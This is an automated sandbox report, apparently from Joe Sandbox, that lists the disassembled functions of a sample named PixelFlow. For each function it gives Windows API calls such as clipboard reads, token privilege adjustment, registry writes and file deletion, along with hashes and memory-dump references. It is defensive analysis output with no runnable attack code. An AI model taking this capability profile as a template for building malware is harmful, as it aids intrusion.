Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
Instruction ID: 9be63970e761863d9dad8e434f7136f27ad42b535d4b6d96c79526748b2adfc9
Opcode Fuzzy Hash: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
Instruction Fuzzy Hash: C9F0D47240020DFBDF05CF90C945EAABB7AFB14314F208589FD198A211D736DA61AB91

Function 006208F0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 0062090F

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: d69e70bb7813a084b11dfb29b7f5d15b2cca54979a0c7e2c0a3bd499b4782dc0
Instruction ID: 5a5f31681e340130a69c206584e2dcc44177d502f2cdc73e5d3a2c88235d6432
Opcode Fuzzy Hash: d69e70bb7813a084b11dfb29b7f5d15b2cca54979a0c7e2c0a3bd499b4782dc0
Instruction Fuzzy Hash: 7EE08636A001285BC761D6A89C05FEA77DEDB89691F0441B6FD09D7204D9605C8186D5

Function 00664B85 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00664B9E

Part of subcall function 00611821: _memmove.LIBCMT ref: 0061185B

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: 73cfa5f2beb42f03dd3d74eeaa81b1613298b53bd8c7fb145b562d009ba5f536
Instruction ID: 25e85cd345455393368287b2fcaaebfb3e37fcdd9e710752e41432b066e375e6
Opcode Fuzzy Hash: 73cfa5f2beb42f03dd3d74eeaa81b1613298b53bd8c7fb145b562d009ba5f536
Instruction Fuzzy Hash: C6D05EA590032C6FEBA0EAB59C0DDFB7BADD744220F0006A67D5CC3101E9249D8586E0

Function 0066762F Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00067615,00000000,00000000,?), ref: 0066764A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 15f066e5a66e5575bd14d3332b219c5db50c8003db927cec8d9b473f1a74540b
Instruction ID: f1f7e2a3ddcff4f67f650f018bb81cee20924715ab80c54af0eabb1045f497c5
Opcode Fuzzy Hash: 15f066e5a66e5575bd14d3332b219c5db50c8003db927cec8d9b473f1a74540b
Instruction Fuzzy Hash: ADD012714247147FA7288B69DC0ACA7769DE505619740176FB805C1601F6A1BC0086A0

Function 00664E59 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00663A6B), ref: 00664E5A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bace901a504a56bf04d0134617e749d0b3a68cc055c0b9c765fe44236748cad7
Instruction ID: fec87031589882dc496da4916c3e8b91bd66e5377842f19419836fd624bf5694
Opcode Fuzzy Hash: bace901a504a56bf04d0134617e749d0b3a68cc055c0b9c765fe44236748cad7
Instruction Fuzzy Hash: 6FB0922410060049AE680AB91A081D9330AA8827A9FD82B81DA7485AE28A3A8C4BA610

Function 006253AB Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 006253B6

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 5c13410e9beb86eb4fa094d49e25d9e126298ccb2000e9762c56e13904ecc165
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 5CB0927644061C77CE112A82FC02A593B1A9B406A8F409020FB0C181A2A6B3A6609A89

Function 006234BA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 006234C4

Part of subcall function 0062338B: __lock.LIBCMT ref: 00623399
Part of subcall function 0062338B: DecodePointer.KERNEL32(006BAEF0,0000001C,006232E4,00620F33,00000001,00000000,?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 006233D8
Part of subcall function 0062338B: DecodePointer.KERNEL32(?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 006233E9
Part of subcall function 0062338B: EncodePointer.KERNEL32(00000000,?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 00623402
Part of subcall function 0062338B: DecodePointer.KERNEL32(-00000004,?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 00623412
Part of subcall function 0062338B: EncodePointer.KERNEL32(00000000,?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 00623418
Part of subcall function 0062338B: DecodePointer.KERNEL32(?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 0062342E
Part of subcall function 0062338B: DecodePointer.KERNEL32(?,00623232,000000FF,?,00629D8E,00000011,00620F33,?,00629BDC,0000000D), ref: 00623439

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: 8821b5902122f2b74b97b4359151af57bfe0837744faeda980a5363e65384b88
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: 25B0123158431C33DA102541FC03FC53B0D4740B94F100024FA0C1C2E1AB93776144CD

Function 0066C0DD Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00663E72: FindFirstFileW.KERNELBASE(?,?), ref: 00663EE9
Part of subcall function 00663E72: DeleteFileW.KERNEL32(?,?,?,?), ref: 00663F39
Part of subcall function 00663E72: FindNextFileW.KERNEL32(00000000,00000010), ref: 00663F4A
Part of subcall function 00663E72: FindClose.KERNEL32(00000000), ref: 00663F61

GetLastError.KERNEL32 ref: 0066C0FF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: e3e187a609a28d3cb4bdffa58a39fc974072746c19329449ad0a19b9b4e8301b
Instruction ID: 9dc4a7087ecf6410413008fcab036624782eaef5a6ef0e31d23ebf1072842860
Opcode Fuzzy Hash: e3e187a609a28d3cb4bdffa58a39fc974072746c19329449ad0a19b9b4e8301b
Instruction Fuzzy Hash: 4DF082362005148FD754EF59D850BAAB7E6AF88320F04841EF94687392CB74BC41CB94

Non-executed Functions

Function 0068CEDF Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 006029E2: GetWindowLongW.USER32(?,000000EB), ref: 006029F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0068CF5A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068CFB8
GetWindowLongW.USER32(?,000000F0), ref: 0068CFF9
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068D023
SendMessageW.USER32 ref: 0068D04C
_wcsncpy.LIBCMT ref: 0068D0B8
GetKeyState.USER32(00000011), ref: 0068D0D9
GetKeyState.USER32(00000009), ref: 0068D0E6
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0068D0FC
GetKeyState.USER32(00000010), ref: 0068D106
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0068D12F
SendMessageW.USER32 ref: 0068D156
SendMessageW.USER32(?,00001030,?,0068B735), ref: 0068D25A
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0068D270
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0068D283
SetCapture.USER32(?), ref: 0068D28C
ClientToScreen.USER32(?,?), ref: 0068D2F1
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0068D2FE
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0068D318
ReleaseCapture.USER32 ref: 0068D323
GetCursorPos.USER32(?), ref: 0068D35D
ScreenToClient.USER32(?,?), ref: 0068D36A
SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D3C6
SendMessageW.USER32 ref: 0068D3F4
SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D431
SendMessageW.USER32 ref: 0068D460
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0068D481
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0068D490
GetCursorPos.USER32(?), ref: 0068D4B0
ScreenToClient.USER32(?,?), ref: 0068D4BD
GetParent.USER32(?), ref: 0068D4DD
SendMessageW.USER32(?,00001012,00000000,?), ref: 0068D546
SendMessageW.USER32 ref: 0068D577
ClientToScreen.USER32(?,?), ref: 0068D5D5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0068D605
SendMessageW.USER32(?,00001111,00000000,?), ref: 0068D62F
SendMessageW.USER32 ref: 0068D652
ClientToScreen.USER32(?,?), ref: 0068D6A4
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0068D6D8

Part of subcall function 006029AB: GetWindowLongW.USER32(?,000000EB), ref: 006029BC

GetWindowLongW.USER32(?,000000F0), ref: 0068D774

Strings

prl, xrefs: 0068D2D2
F, xrefs: 0068D658
@GUI_DRAGID, xrefs: 0068D2BF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$prl
API String ID: 3977979337-212714731
Opcode ID: f5521d95ca409791eb9f5c839a85408eda82670d7f01674f53d304b7a15cd036
Instruction ID: 173dfeacddf6e1cb986300f445bb65f5d11f91cf0eadda914f0872c263942d6b
Opcode Fuzzy Hash: f5521d95ca409791eb9f5c839a85408eda82670d7f01674f53d304b7a15cd036
Instruction Fuzzy Hash: 65428E74104301AFEB24EF24C848EAABBE7FF49714F144A1DF659872A1C731E855CBA6

Function 00658D11 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 0065917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006591C6
Part of subcall function 0065917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006591F3
Part of subcall function 0065917C: GetLastError.KERNEL32 ref: 00659200

_memset.LIBCMT ref: 00658D54
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00658DA6
CloseHandle.KERNEL32(?), ref: 00658DB7
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00658DCE
GetProcessWindowStation.USER32 ref: 00658DE7
SetProcessWindowStation.USER32(00000000), ref: 00658DF1
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00658E0B

Part of subcall function 00658BCC: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658D0A), ref: 00658BE1
Part of subcall function 00658BCC: CloseHandle.KERNEL32(?,?,00658D0A), ref: 00658BF3

Strings

, xrefs: 00658D63
winsta0, xrefs: 00658DC9
default, xrefs: 00658E06

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: f0e0ae8b22775b50098acb1d0aca9b4e7d57a07b1bd59df613960b8c333f791a
Instruction ID: 0f5aad35e5307a315e765dba386a86404e173551cbbdb6f4e16b281972d7b593
Opcode Fuzzy Hash: f0e0ae8b22775b50098acb1d0aca9b4e7d57a07b1bd59df613960b8c333f791a
Instruction Fuzzy Hash: D3815971800209AFEF11AFA0DD45AEE7BBBEF08355F14415AFD14B7661DB318E589B20

Function 00674416 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00690980), ref: 00674440
IsClipboardFormatAvailable.USER32(0000000D), ref: 0067444E
GetClipboardData.USER32(0000000D), ref: 00674456
CloseClipboard.USER32 ref: 00674462
GlobalLock.KERNEL32(00000000), ref: 0067447E
CloseClipboard.USER32 ref: 00674488
GlobalUnlock.KERNEL32(00000000,00000000), ref: 0067449D
IsClipboardFormatAvailable.USER32(00000001), ref: 006744AA
GetClipboardData.USER32(00000001), ref: 006744B2
GlobalLock.KERNEL32(00000000), ref: 006744BF
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 006744F3
CloseClipboard.USER32 ref: 00674603

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: fe11fda26070d08f179ac5fc661ce860c065362dfcc95f7d234eda712fd91767
Instruction ID: 8c782c00ec33642bf2cc4517b5c0872da4da3aecb7b31d4f34b81314af95e68b
Opcode Fuzzy Hash: fe11fda26070d08f179ac5fc661ce860c065362dfcc95f7d234eda712fd91767
Instruction Fuzzy Hash: 8C519F71244201AFE700EF60DC49FAE77AEAF84B41F00852EF65AD62E1DF70D9058B66

Function 0066CC0C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0066CC3D
FindClose.KERNEL32(00000000), ref: 0066CC91
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066CCB6
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0066CCCD
FileTimeToSystemTime.KERNEL32(?,?), ref: 0066CCF4
__swprintf.LIBCMT ref: 0066CD40
__swprintf.LIBCMT ref: 0066CD83

Part of subcall function 00611A36: _memmove.LIBCMT ref: 00611A77

__swprintf.LIBCMT ref: 0066CDD7

Part of subcall function 006237FA: __woutput_l.LIBCMT ref: 00623853

__swprintf.LIBCMT ref: 0066CE25

Part of subcall function 006237FA: __flsbuf.LIBCMT ref: 00623875
Part of subcall function 006237FA: __flsbuf.LIBCMT ref: 0062388D

__swprintf.LIBCMT ref: 0066CE74
__swprintf.LIBCMT ref: 0066CEC3
__swprintf.LIBCMT ref: 0066CF12

Strings

%4d, xrefs: 0066CD7D
%02d, xrefs: 0066CDCB, 0066CDD5, 0066CE23, 0066CE72, 0066CEC1, 0066CF10
%4d%02d%02d%02d%02d%02d, xrefs: 0066CD3A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 7ee77265d5714a72fcd3cc1715599d451919ac669b729bfcd8889efbc664be6c
Instruction ID: 00a1d0237f31abe43a0d0d50d58ae9ac58f3b9a47d456c8e1c633b80d759cd04
Opcode Fuzzy Hash: 7ee77265d5714a72fcd3cc1715599d451919ac669b729bfcd8889efbc664be6c
Instruction Fuzzy Hash: FBA15EB1404304ABD754EFA0D886DAFB7EEEF95700F40491DF68587191EB34EA48CB66

Function 0066F445 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0066F466
_wcscmp.LIBCMT ref: 0066F47B
_wcscmp.LIBCMT ref: 0066F492
GetFileAttributesW.KERNEL32(?), ref: 0066F4A4
SetFileAttributesW.KERNEL32(?,?), ref: 0066F4BE
FindNextFileW.KERNEL32(00000000,?), ref: 0066F4D6
FindClose.KERNEL32(00000000), ref: 0066F4E1
FindFirstFileW.KERNEL32(*.*,?), ref: 0066F4FD
_wcscmp.LIBCMT ref: 0066F524
_wcscmp.LIBCMT ref: 0066F53B
SetCurrentDirectoryW.KERNEL32(?), ref: 0066F54D
SetCurrentDirectoryW.KERNEL32(006B98F8), ref: 0066F56B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F575
FindClose.KERNEL32(00000000), ref: 0066F582
FindClose.KERNEL32(00000000), ref: 0066F594

Strings

*.*, xrefs: 0066F4F8

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: ec256690ac82d200a0a6833384660a55c65706ba2286586251bebc40c2ff7cde
Instruction ID: d25ad5f8f46c55d90aef2f9f8ae9b23f0d29c58d0b8a43f4b81179022a26a98b
Opcode Fuzzy Hash: ec256690ac82d200a0a6833384660a55c65706ba2286586251bebc40c2ff7cde
Instruction Fuzzy Hash: 0F31A3325012297EEB10DFA5FC49ADE77AEAF19320F100566F915D3290EF34DE448B64

Function 00680C7F Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00680D7B
RegCreateKeyExW.ADVAPI32(?,?,00000000,00690980,00000000,?,00000000,?,?), ref: 00680DE9
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00680E31
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00680EBA
RegCloseKey.ADVAPI32(?), ref: 006811DA
RegCloseKey.ADVAPI32(00000000), ref: 006811E7

Strings

REG_BINARY, xrefs: 00681175
REG_MULTI_SZ, xrefs: 00680FA2
REG_EXPAND_SZ, xrefs: 00680E57
REG_SZ, xrefs: 00680EF8
REG_QWORD, xrefs: 00681128
REG_DWORD, xrefs: 006810AB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: afd9cd060e46993b40014ddf630bc9e6d19f9b709520fc99a953d9a7e8f717cc
Instruction ID: 1541db9e6adee6e0ba07d8f643e39bdaec75333eb7f5102eb8baca73f61539a1
Opcode Fuzzy Hash: afd9cd060e46993b40014ddf630bc9e6d19f9b709520fc99a953d9a7e8f717cc
Instruction Fuzzy Hash: 18027DB52006019FC764EF14C855E6AB7EAFF89314F04895DF98A9B3A2CB30ED41CB95

Function 0066F5A2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0066F5C3
_wcscmp.LIBCMT ref: 0066F5D8
_wcscmp.LIBCMT ref: 0066F5EF

Part of subcall function 006646E2: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006646FD

FindNextFileW.KERNEL32(00000000,?), ref: 0066F61E
FindClose.KERNEL32(00000000), ref: 0066F629
FindFirstFileW.KERNEL32(*.*,?), ref: 0066F645
_wcscmp.LIBCMT ref: 0066F66C
_wcscmp.LIBCMT ref: 0066F683
SetCurrentDirectoryW.KERNEL32(?), ref: 0066F695
SetCurrentDirectoryW.KERNEL32(006B98F8), ref: 0066F6B3
FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F6BD
FindClose.KERNEL32(00000000), ref: 0066F6CA
FindClose.KERNEL32(00000000), ref: 0066F6DC

Strings

*.*, xrefs: 0066F640

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
